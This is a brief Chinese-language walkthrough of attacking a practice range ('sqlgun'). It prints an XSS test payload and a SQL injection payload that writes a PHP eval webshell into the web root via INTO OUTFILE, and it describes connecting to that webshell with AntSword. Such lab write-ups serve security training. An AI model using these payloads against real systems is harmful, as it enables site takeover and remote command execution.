sqlgun靶场漏洞挖掘

1.xss漏洞

搜索框输入以下代码，验证是否存在xss漏洞

<script>alert(1)</script>

OK了，存在xss漏洞

2.SQL注入

经过测试，输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密，解码内容如下

找了半天，没有找到管理员登录界面，所以找到管理员账号和密码没有用，虽然没有，但是证明了一点，那就是此处可以无限制输入命令，并执行，通过扫描目录发现存在phpinfo文件，访问得知网站绝对路径

于是乎，尝试使用sql注入的方式，上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功，蚁剑连接大脑，cmd代替思考

完事🧐